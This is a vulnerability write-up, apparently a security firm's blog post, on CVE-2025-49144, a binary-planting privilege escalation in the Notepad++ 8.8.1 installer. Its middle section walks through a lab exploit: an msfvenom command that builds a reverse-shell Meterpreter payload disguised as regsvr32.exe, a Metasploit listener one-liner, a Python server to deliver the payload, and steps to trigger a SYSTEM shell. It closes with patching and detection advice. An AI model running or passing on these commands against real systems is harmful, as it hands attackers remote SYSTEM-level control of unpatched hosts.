Weaponizing Path Search Hijacking – Enterprise-Grade Analysis of CVE-2025-49144

Weaponizing Path Search Hijacking – Enterprise-Grade Analysis of CVE-2025-49144

ValueSec ValueSec

ValueSec

Helping Businesses to Achieve Cyber Resilience

Published Aug 13, 2025
+ Follow

CVE-2025-49144 is a local privilege escalation vulnerability in the Windows installer for Notepad++ version 8.8.1, caused by unsafe invocation of the system utility regsvr32.exe without specifying an absolute path. When the installer attempts to register or unregister shell extension components, it calls regsvr32 by name, triggering Windows’ default executable search order.

This search order prioritizes the current working directory, enabling an adversary to plant a malicious regsvr32.exe alongside the installer. Upon execution, the installer unwittingly launches the attacker’s binary under elevated privileges, granting SYSTEM-level code execution.

Although exploitation requires local access to place the payload in the installer’s directory, the simplicity and reliability of the hijack make it a potent post-compromise escalation technique. It bypasses UAC prompts during installer execution and aligns with MITRE ATT&CK technique T1574.002 (Hijack Execution Flow: DLL Side-Loading/Binary Planting).

Mitigation demands updating to Notepad++ 8.8.2 or later, which hardcodes the system path for regsvr32.exe, as well as enforcing application allowlisting to block execution from non-trusted directories. Security teams should deploy telemetry to detect high-integrity processes spawning regsvr32.exe from unexpected locations, correlating with installer activity to identify malicious hijacks.

CVE-2025-49144 underscores the enduring risk of unqualified path usage in privileged processes and the critical importance of secure coding practices in software installation routines.

Impact of CVE-2025-49144:

Silent Privilege Escalation Allows attacker-supplied executables to run with SYSTEM privileges during Notepad++ installation, without prompting the user, by exploiting unqualified path resolution.

Post-Compromise Escalation Vector Provides a reliable means for low-privilege users or foothold malware to elevate privileges and gain full control over the host.

Bypass of UAC and Installer Trust Abuses the trusted Notepad++ installer process to execute malicious binaries, sidestepping User Account Control prompts and code-signing checks.

Execution Chain Masquerading as Legitimate Activity Executes attacker content through the installer’s normal process tree, making it appear indistinguishable from legitimate software setup activity to basic EDR rules.

Potential for Domain-Wide Impact When used on endpoints joined to a domain, enables privilege escalation that can be leveraged for lateral movement and broader network compromise.

The issue occur because:

The issue in CVE-2025-49144 comes from the Notepad++ 8.8.1 installer calling regsvr32.exe without its full path. Because Windows searches the current folder first, a malicious regsvr32.exe placed alongside the installer will be run instead of the real one. This lets an attacker’s file execute with SYSTEM privileges, turning a normal install step into a privilege escalation point.

Environment and Setup:

Target OS: Windows 11 Pro (x64), Version 23H2 (fully patched) – also reproducible on Windows 10 Pro 22H2

Notepad++ Version: 8.8.1 (vulnerable installer)

Payload: regsvr32.exe generated via msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4443 -f exe

Payload Placement: Same directory as Notepad++ installer executable

Attack Platform: Kali Linux 2024.x (attacker machine)

Listener: Metasploit Framework (msfconsole) with exploit/multi/handler configured for above payload

Windows Defender: Disabled real-time protection during testing to prevent payload removal

Execution Method: Notepad++ installer launched from payload directory using double-click in File Explorer

Privilege Context: Installer prompts for elevation; payload inherits SYSTEM-level token

Detection Tool: Process event tracing via Windows Event Viewer (Event ID 4688) to verify payload execution path

Manual Validation: Observed active Meterpreter session on Kali after installer run• Confirmed Behavior: Malicious regsvr32.exe executed instead of legitimate system binary due to unqualified path call, resulting in SYSTEM shell

Validation Scope:

This analysis confirms that the target system is verifiably vulnerable to CVE-2025-49144. The proof-of-concept successfully replaced the intended system regsvr32.exe call during the Notepad++ 8.8.1 installation with a malicious binary placed in the same directory, resulting in execution under SYSTEM privileges. This behavior validates the presence of the unqualified path call flaw and proves that the installer’s execution chain can be hijacked locally.

While the test demonstration was performed on a controlled lab system and payload execution was limited to a reverse shell for validation purposes, the observed behavior confirms that the same vector can be weaponized in real-world environments. If paired with a staged malware loader or integrated into a post-compromise toolkit, this path hijacking could enable full privilege escalation on enterprise endpoints.

This validation emphasizes the need for immediate patching to Notepad++ 8.8.2 or later, strict enforcement of execution policies for user-writable locations, and deployment of telemetry rules to flag high-integrity processes invoking regsvr32.exe from non-system directories. Even without malicious code execution at the time of testing, the confirmed ability to redirect privileged process calls signals a systemic security gap requiring prompt remediation.

Architectural Deconstruction of CVE-2025-49144 in Windows Path Handling Logic:

1. Creating the Malicious Payload

On the Kali Linux attacker machine, a reverse TCP Meterpreter payload was generated using msfvenom.The payload was configured to connect back to the attacker’s IP (192.168.42.129) on port 4443 when executed.

#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4443 -f exe -o regsvr32.exe

fig 01: this is payload

2. Setting Up the Listener

#sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0;set LPORT 4443; set AutoRunScript post/windows/manage/migrate;run"

fig 02: this is listener

3. Sending the payload via local Python server

#python3 -m http.server 9000

fig 03: python server is running

4. Downloading the Vulnerable Notepad++ Installer and regsvr32.exe

On the target Windows 11 machine, the Notepad++ 8.8.1 (x64) installer — the vulnerable version affected by CVE-2025-49144 — was downloaded directly from a trusted historical software archive or the official Notepad++ GitHub release page.

Download Notepad++ v8.8.1: We are with Ukraine | Notepad++

The installer file, typically named: npp.8.8.1.Installer.x64.exe

was saved into the same folder where the malicious regsvr32.exe payload had been placed earlier that where http://<KaliIp>:9000 then downloaded.

At this stage, the folder contained:

  • npp.8.8.1.Installer.x64.exe (vulnerable installer)

  • regsvr32.exe (malicious payload)

try installing notepad++

fig 04: downloaded notepad++ and regsvr32.exe in same folder here can see

This setup ensured that when the installer invoked regsvr32.exe without a full path, Windows would execute the attacker’s payload instead of the legitimate system binary.

  • Ensure regsvr32.exe (malicious payload) and npp.8.8.1.Installer.x64.exe are in the same folder.

  • On Windows, double-click the installer from inside that folder (do not run from another location).

  • The installer will prompt for elevation (UAC). Approve it.

  • As the installer runs, it calls regsvr32.exe without a full path — executing your malicious version.

  • On Kali, your Metasploit listener will catch a SYSTEM-level Meterpreter session.

5. Triggering the Exploit

With both the regsvr32.exe malicious payload and the npp.8.8.1.Installer.x64.exe vulnerable installer in the same folder, the exploit is triggered simply by launching the Notepad++ 8.8.1 installer from that directory.

  • When the installer runs, it automatically calls regsvr32.exe without using the full system path.

  • Because the malicious regsvr32.exe is in the same folder, Windows executes it instead of the legitimate one in C:\Windows\System32.

  • This results in the payload being executed with SYSTEM privileges, sending a reverse connection to the Metasploit listener on the attacker’s machine.

Once triggered, the listener on Kali will show an incoming Meterpreter session with NT AUTHORITY\SYSTEM privileges.

fig 05/06: this is when I try install notepad++ it automatically calls fake regsvr32.exe which is made by attacker.

Mitigation and Fixes

  • Apply Vendor Patch Immediately Upgrade to Notepad++ 8.8.2 or later, where the installer explicitly calls the full system path for regsvr32.exe, closing the path hijacking vulnerability.

  • Restrict Execution from User-Writable Folders Enforce application control policies (AppLocker, WDAC) to block execution of EXE files from directories like Downloads, Desktop, or Temp.

  • Harden Installer and Build Practices Developers must always reference system binaries with absolute paths in installers to prevent search-order hijacking.

  • Enhance Detection Rules Deploy EDR/SIEM alerts for high-integrity processes launching regsvr32.exe from any location outside C:\Windows\System32\.

  • Limit Local Write Access to Install Locations Ensure folders used for software installation are write-protected from non-administrator accounts.

Conclusion

CVE-2025-49144 demonstrates how a simple installer misstep—calling a trusted system binary without its full path—can be turned into a high-impact privilege escalation vector. By exploiting Windows’ search-order behavior, attackers can coerce an elevated installer to run their malicious binary instead of the intended system file, achieving SYSTEM-level execution with minimal effort.

Our demonstration confirmed the exploit’s viability on fully patched, enterprise-grade Windows environments, underscoring that even modern systems can be compromised through overlooked operational assumptions in software installation routines.

This proof-of-concept reinforces the importance of absolute path usage, execution restrictions from user-writable locations, and active monitoring of privileged processes invoking binaries from non-standard paths.

Trust in execution flow is not a given—it must be designed, enforced, and validated.

Patch. Monitor. Validate. Relentlessly.

To view or add a comment, sign in

More articles by this author

Explore topics